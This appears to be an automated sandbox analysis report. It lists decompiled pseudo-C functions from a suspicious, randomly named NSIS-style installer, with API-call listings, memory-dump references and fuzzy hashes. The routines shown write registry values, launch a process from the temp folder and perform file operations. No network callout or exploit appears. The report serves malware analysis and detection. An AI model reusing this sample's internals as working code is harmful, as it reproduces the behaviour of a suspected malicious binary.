                                                                      				wsprintfA(_t26 + lstrlenA(0x42a488), "%u.%u%s%s");
                                                                      				return SetDlgItemTextA( *0x42e7f8, _a4, 0x42a488);
                                                                      			}

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404476,000000DF,?,00000000,00000400), ref: 004045E4
                                                                      • wsprintfA.USER32 ref: 004045EC
                                                                      • SetDlgItemTextA.USER32 ref: 004045FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: 64a4aac5eaa70763bdacf4e8d4062d8ddb7d8a1686be96c013f54f202a635439
                                                                      • Instruction ID: cfae16ef9c8bc24b09f19e15c1b273aab45c223eefe3bce1affb9d6119793989
                                                                      • Opcode Fuzzy Hash: 64a4aac5eaa70763bdacf4e8d4062d8ddb7d8a1686be96c013f54f202a635439
                                                                      • Instruction Fuzzy Hash: 9F1108B3A0012477DB10666D9C45EEF375DCBC53B4F14023BFA25F61D1E9788C1186A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E00401C13() {
                                                                      				signed int _t30;
                                                                      				CHAR* _t33;
                                                                      				long _t34;
                                                                      				int _t39;
                                                                      				signed int _t40;
                                                                      				int _t44;
                                                                      				void* _t46;
                                                                      				int _t51;
                                                                      				struct HWND__* _t55;
                                                                      				void* _t58;
                                                                      
                                                                      				 *(_t58 - 8) = E00402A9D(0x33);
                                                                      				 *(_t58 + 8) = E00402A9D(0x44);
                                                                      				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
                                                                      					 *((intOrPtr*)(__ebp - 8)) = E0040591B(__ecx,  *((intOrPtr*)(__ebp - 8)));
                                                                      				}
                                                                      				__eflags =  *(_t58 - 0x10) & 0x00000002;
                                                                      				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
                                                                      					 *(_t58 + 8) = E0040591B(_t46,  *(_t58 + 8));
                                                                      				}
                                                                      				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
                                                                      				_push(1);
                                                                      				if(__eflags != 0) {
                                                                      					_t53 = E00402A9D();
                                                                      					_t30 = E00402A9D();
                                                                      					asm("sbb ecx, ecx");
                                                                      					asm("sbb eax, eax");
                                                                      					_t33 =  ~( *_t29) & _t53;
                                                                      					__eflags = _t33;
                                                                      					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
                                                                      					goto L10;
                                                                      				} else {
                                                                      					_t55 = E00402A80();
                                                                      					_t39 = E00402A80();
                                                                      					_t51 =  *(_t58 - 0x10) >> 2;
                                                                      					if(__eflags == 0) {
                                                                      						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
                                                                      						L10:
                                                                      						 *(_t58 - 0x34) = _t34;
                                                                      					} else {
                                                                      						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
                                                                      						asm("sbb eax, eax");
                                                                      						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
                                                                      					}
                                                                      				}
                                                                      				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
                                                                      				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
                                                                      					_push( *(_t58 - 0x34));
                                                                      					E00405902();
                                                                      				}
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t58 - 4));
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C75
                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: e11061bb72638ae3bd0deea313d8b482590b00c30fe41d764879ae94fe1161ee
                                                                      • Instruction ID: 3a5bf530ac752b22a437cfc31646007f5d79456975b3ba3d86b5e97f3a866c7b
                                                                      • Opcode Fuzzy Hash: e11061bb72638ae3bd0deea313d8b482590b00c30fe41d764879ae94fe1161ee
                                                                      • Instruction Fuzzy Hash: 30219271A44109BFDF01AFA1CD4AAEE7FB5EF44308F10443AF502BA1E1D7798A819B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00401E96() {
                                                                      				void* _t15;
                                                                      				void* _t24;
                                                                      				void* _t26;
                                                                      				void* _t31;
                                                                      
                                                                      				_t28 = E00402A9D(_t24);
                                                                      				E00404D69(0xffffffeb, _t13);
                                                                      				_t15 = E00405222(_t28, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                                      				 *(_t31 + 8) = _t15;
                                                                      				if(_t15 == _t24) {
                                                                      					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                      				} else {
                                                                      					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                                                                      						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                                                      							E00405CD4(0xf);
                                                                      						}
                                                                      						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
                                                                      						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                                                                      							if( *(_t31 - 0x34) != _t24) {
                                                                      								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                      							}
                                                                      						} else {
                                                                      							E00405902(_t26,  *(_t31 - 0x34));
                                                                      						}
                                                                      					}
                                                                      					_push( *(_t31 + 8));
                                                                      					CloseHandle();
                                                                      				}
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t31 - 4));
                                                                      				return 0;
                                                                      			}


                                                                      APIs
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000,?), ref: 00404DA2
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(0040300F,00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000), ref: 00404DB2
                                                                        • Part of subcall function 00404D69: lstrcatA.KERNEL32(00429C60,0040300F,0040300F,00429C60,00000000,0041A9FD,74B5EA30), ref: 00404DC5
                                                                        • Part of subcall function 00404D69: SetWindowTextA.USER32(00429C60,00429C60), ref: 00404DD7
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DFD
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E17
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E25
                                                                        • Part of subcall function 00405222: GetFileAttributesA.KERNEL32(?,00000000), ref: 00405235
                                                                        • Part of subcall function 00405222: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0042C490,?), ref: 0040525E
                                                                        • Part of subcall function 00405222: CloseHandle.KERNEL32(?), ref: 0040526B
                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401ED5
                                                                      • GetExitCodeProcess.KERNEL32 ref: 00401EE5
                                                                      • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F0A
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401EA6
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 4003922372-501415292
                                                                      • Opcode ID: 665863f770ee8eec5de89819d747f022481933cd07641249716b5007927fa64f
                                                                      • Instruction ID: c77dd41efbf8efa9af3da6ff060a12916a8f1a2e1a374128a63c245e177da6a4
                                                                      • Opcode Fuzzy Hash: 665863f770ee8eec5de89819d747f022481933cd07641249716b5007927fa64f
                                                                      • Instruction Fuzzy Hash: 2F016D71904109EBCF11AF91DD45A9E76B1EF00309F20407BF601B51E1C7795A41AF9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E0040557D(void* __eflags, intOrPtr _a4) {
                                                                      				int _t11;
                                                                      				signed char* _t12;
                                                                      				intOrPtr _t18;
                                                                      				intOrPtr* _t21;
                                                                      				void* _t22;
                                                                      
                                                                      				E004059A4(0x42b890, _a4);
                                                                      				_t21 = E00405530(0x42b890);
                                                                      				if(_t21 != 0) {
                                                                      					E00405BD3(_t21);
                                                                      					if(( *0x42f030 & 0x00000080) == 0) {
                                                                      						L5:
                                                                      						_t22 = _t21 - 0x42b890;
                                                                      						while(1) {
                                                                      							_t11 = lstrlenA(0x42b890);
                                                                      							_push(0x42b890);
                                                                      							if(_t11 <= _t22) {
                                                                      								break;
                                                                      							}
                                                                      							_t12 = E00405C6C();
                                                                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                      								E004054E4(0x42b890);
                                                                      								continue;
                                                                      							} else {
                                                                      								goto L1;
                                                                      							}
                                                                      						}
                                                                      						E0040549D();
                                                                      						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                                      					}
                                                                      					_t18 =  *_t21;
                                                                      					if(_t18 == 0 || _t18 == 0x5c) {
                                                                      						goto L1;
                                                                      					} else {
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      				L1:
                                                                      				return 0;
                                                                      			}


                                                                      APIs
                                                                        • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1
                                                                        • Part of subcall function 00405530: CharNextA.USER32(004052F0,C:\Users\user\AppData\Local\Temp\,0042B890,?,00405594,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 0040553E
                                                                        • Part of subcall function 00405530: CharNextA.USER32(00000000), ref: 00405543
                                                                        • Part of subcall function 00405530: CharNextA.USER32(00000000), ref: 00405552
                                                                      • lstrlenA.KERNEL32(0042B890,00000000,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 004055D0
                                                                      • GetFileAttributesA.KERNEL32(0042B890,0042B890,0042B890,0042B890,0042B890,0042B890,00000000,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 004055E0
                                                                      Strings
                                                                      • "C:\Users\user\Desktop\aaVb1xEmrd.exe" , xrefs: 0040557D
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040557E
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\aaVb1xEmrd.exe" $C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 3248276644-1730828616
                                                                      • Opcode ID: 96c86cf9868eca16e86c16923d2ccaad86c39b2b05d73de1ca30cf98d7d6add5
                                                                      • Instruction ID: 08f83a9645d615a1f3fca6076c9258d5bd8495f27e2b0ae55a07427201ac287e
                                                                      • Opcode Fuzzy Hash: 96c86cf9868eca16e86c16923d2ccaad86c39b2b05d73de1ca30cf98d7d6add5
                                                                      • Instruction Fuzzy Hash: F5F02821115E5176D622233A5C09BAF1B57CE86328758013BF854B12DADB3C89438DBE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0040549D(CHAR* _a4) {
                                                                      				CHAR* _t7;
                                                                      
                                                                      				_t7 = _a4;
                                                                      				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                      					lstrcatA(_t7, 0x409010);
                                                                      				}
                                                                      				return _t7;
                                                                      			}


                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403147,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 004054A3
                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403147,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 004054AC
                                                                      • lstrcatA.KERNEL32(?,00409010), ref: 004054BD
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040549D
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-3916508600
                                                                      • Opcode ID: fa18c72888df976b0cdd87e733246f6d285642e2e97fc5e36dee98bae91ecb96
                                                                      • Instruction ID: 7accce88ca4bde2ae3d88cdcd9180504cfe9e7b5ea7e201f7bf235b5a5a95591
                                                                      • Opcode Fuzzy Hash: fa18c72888df976b0cdd87e733246f6d285642e2e97fc5e36dee98bae91ecb96
                                                                      • Instruction Fuzzy Hash: 42D0A7A2605A30AAE11122154C05FCF2D28CF46311F044422F144B21D2C2BC1C418BED
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E00402383(void* __eax) {
                                                                      				void* _t15;
                                                                      				char* _t18;
                                                                      				int _t19;
                                                                      				char _t24;
                                                                      				int _t27;
                                                                      				intOrPtr _t30;
                                                                      				void* _t35;
                                                                      
                                                                      				_t15 = E00402B64(__eax);
                                                                      				_t30 =  *((intOrPtr*)(_t35 - 0x14));
                                                                      				 *(_t35 - 0x30) =  *(_t35 - 0x10);
                                                                      				 *(_t35 - 0x44) = E00402A9D(2);
                                                                      				_t18 = E00402A9D(0x11);
                                                                      				 *(_t35 - 4) = 1;
                                                                      				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
                                                                      				if(_t19 == 0) {
                                                                      					if(_t30 == 1) {
                                                                      						E00402A9D(0x23);
                                                                      						_t19 = lstrlenA(0x40a3e8) + 1;
                                                                      					}
                                                                      					if(_t30 == 4) {
                                                                      						_t24 = E00402A80(3);
                                                                      						 *0x40a3e8 = _t24;
                                                                      						_t19 = _t30;
                                                                      					}
                                                                      					if(_t30 == 3) {
                                                                      						_t19 = E00402EB4( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a3e8, 0xc00);
                                                                      					}
                                                                      					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a3e8, _t19) == 0) {
                                                                      						 *(_t35 - 4) = _t27;
                                                                      					}
                                                                      					_push( *(_t35 + 8));
                                                                      					RegCloseKey();
                                                                      				}
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *(_t35 - 4);
                                                                      				return 0;
                                                                      			}


                                                                      APIs
                                                                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023B9
                                                                      • lstrlenA.KERNEL32(0040A3E8,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023D9
                                                                      • RegSetValueExA.ADVAPI32(?,?,?,?,0040A3E8,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402412
                                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A3E8,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024F8
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CloseCreateValuelstrlen
                                                                      • String ID:
                                                                      • API String ID: 1356686001-0
                                                                      • Opcode ID: acb5ba45e2f8f4fbc14a41b1742fcc44b9183c903e08a5de38a3b0d1b3cacaf8
                                                                      • Instruction ID: 2edb51e588ba3c232a4f85ee768a2477bcb618cef822ad648bcbfee9d8c62a47
                                                                      • Opcode Fuzzy Hash: acb5ba45e2f8f4fbc14a41b1742fcc44b9183c903e08a5de38a3b0d1b3cacaf8
                                                                      • Instruction Fuzzy Hash: 78118471E00214BEEB10EFA5DE49EAF767CEB10358F10403AF505B61D1D6B85D419A69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E00401F45(char __ebx, char* __edi, char* __esi) {
                                                                      				char* _t21;
                                                                      				int _t22;
                                                                      				void* _t33;
                                                                      
                                                                      				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
                                                                      				_t21 = E00402A9D(0xffffffee);
                                                                      				 *(_t33 - 0x2c) = _t21;
                                                                      				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
                                                                      				 *__esi = __ebx;
                                                                      				 *(_t33 - 8) = _t22;
                                                                      				 *__edi = __ebx;
                                                                      				 *((intOrPtr*)(_t33 - 4)) = 1;
                                                                      				if(_t22 != __ebx) {
                                                                      					__eax = GlobalAlloc(0x40, __eax);
                                                                      					 *(__ebp - 0x34) = __eax;
                                                                      					if(__eax != __ebx) {
                                                                      						if(__eax != 0) {
                                                                      							__ebp - 0x44 = __ebp + 8;
                                                                      							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
                                                                      								 *(__ebp + 8) = E00405902(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
                                                                      								 *(__ebp + 8) = E00405902(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
                                                                      								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                      							}
                                                                      						}
                                                                      						_push( *(__ebp - 0x34));
                                                                      						GlobalFree();
                                                                      					}
                                                                      				}
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t33 - 4));
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F5A
                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F78
                                                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F91
                                                                      • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FAA
                                                                        • Part of subcall function 00405902: wsprintfA.USER32 ref: 0040590F
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                      • String ID:
                                                                      • API String ID: 1404258612-0
                                                                      • Opcode ID: 2b8e42a6b9d4fa02b5f75fb16d08b0ae1d2a9a65ee0503dc016e4bd12e94ec95
                                                                      • Instruction ID: d80a44c5c930a2dc6f3206c71cc4dfa484853edc82de331d7c2dd70d942dae4f
                                                                      • Opcode Fuzzy Hash: 2b8e42a6b9d4fa02b5f75fb16d08b0ae1d2a9a65ee0503dc016e4bd12e94ec95
                                                                      • Instruction Fuzzy Hash: 7A1128B1A01108BEDF01DFA5D9859EEBBB8EF04304F20803AF505F61A1D7389E54DB28
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E004021F3() {
                                                                      				void* __ebx;
                                                                      				char _t33;
                                                                      				CHAR* _t35;
                                                                      				CHAR* _t37;
                                                                      				void* _t40;
                                                                      
                                                                      				_t37 = E00402A9D(_t33);
                                                                      				 *(_t40 + 8) = _t37;
                                                                      				_t35 = E00402A9D(0x11);
                                                                      				 *(_t40 - 0x64) =  *(_t40 - 8);
                                                                      				 *((intOrPtr*)(_t40 - 0x60)) = 2;
                                                                      				( &(_t37[1]))[lstrlenA(_t37)] = _t33;
                                                                      				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
                                                                      				E004059C6(_t33, _t35, 0x40a3e8, 0x40a3e8, 0xfffffff8);
                                                                      				lstrcatA(0x40a3e8, _t35);
                                                                      				 *(_t40 - 0x5c) =  *(_t40 + 8);
                                                                      				 *(_t40 - 0x58) = _t35;
                                                                      				 *(_t40 - 0x4a) = 0x40a3e8;
                                                                      				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
                                                                      				E00404D69(_t33, 0x40a3e8);
                                                                      				if(SHFileOperationA(_t40 - 0x64) != 0) {
                                                                      					E00404D69(0xfffffff9, _t33);
                                                                      					 *((intOrPtr*)(_t40 - 4)) = 1;
                                                                      				}
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t40 - 4));
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • lstrlenA.KERNEL32 ref: 00402215
                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040221F
                                                                      • lstrcatA.KERNEL32(0040A3E8,00000000,0040A3E8,000000F8,00000000), ref: 00402237
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000,?), ref: 00404DA2
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(0040300F,00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000), ref: 00404DB2
                                                                        • Part of subcall function 00404D69: lstrcatA.KERNEL32(00429C60,0040300F,0040300F,00429C60,00000000,0041A9FD,74B5EA30), ref: 00404DC5
                                                                        • Part of subcall function 00404D69: SetWindowTextA.USER32(00429C60,00429C60), ref: 00404DD7
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DFD
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E17
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E25
                                                                      • SHFileOperationA.SHELL32(?,?,0040A3E8,0040A3E8,00000000,0040A3E8,000000F8,00000000), ref: 0040225B
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                      • String ID:
                                                                      • API String ID: 3674637002-0
                                                                      • Opcode ID: 363d70ccfff98ba2865c6782dce067ec9b095fcb7dffcb8770c2d1ed5c515656
                                                                      • Instruction ID: 6d1e946217665ea6dca397224418fd46b4aafc0dfc156e6b869a76ed9929bbd9
                                                                      • Opcode Fuzzy Hash: 363d70ccfff98ba2865c6782dce067ec9b095fcb7dffcb8770c2d1ed5c515656
                                                                      • Instruction Fuzzy Hash: 6611E1B1E04318EACB10EFEA89489CEBBF8AF00314F10413BB514FB2D1C67889418B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405530(CHAR* _a4) {
                                                                      				CHAR* _t3;
                                                                      				char* _t5;
                                                                      				CHAR* _t7;
                                                                      				CHAR* _t8;
                                                                      				void* _t10;
                                                                      
                                                                      				_t8 = _a4;
                                                                      				_t7 = CharNextA(_t8);
                                                                      				_t3 = CharNextA(_t7);
                                                                      				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                                      					if( *_t8 != 0x5c5c) {
                                                                      						L8:
                                                                      						return 0;
                                                                      					}
                                                                      					_t10 = 2;
                                                                      					while(1) {
                                                                      						_t10 = _t10 - 1;
                                                                      						_t5 = E004054C8(_t3, 0x5c);
                                                                      						if( *_t5 == 0) {
                                                                      							goto L8;
                                                                      						}
                                                                      						_t3 = _t5 + 1;
                                                                      						if(_t10 != 0) {
                                                                      							continue;
                                                                      						}
                                                                      						return _t3;
                                                                      					}
                                                                      					goto L8;
                                                                      				} else {
                                                                      					return CharNextA(_t3);
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • CharNextA.USER32(004052F0,C:\Users\user\AppData\Local\Temp\,0042B890,?,00405594,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 0040553E
                                                                      • CharNextA.USER32(00000000), ref: 00405543
                                                                      • CharNextA.USER32(00000000), ref: 00405552
                                                                      Strings
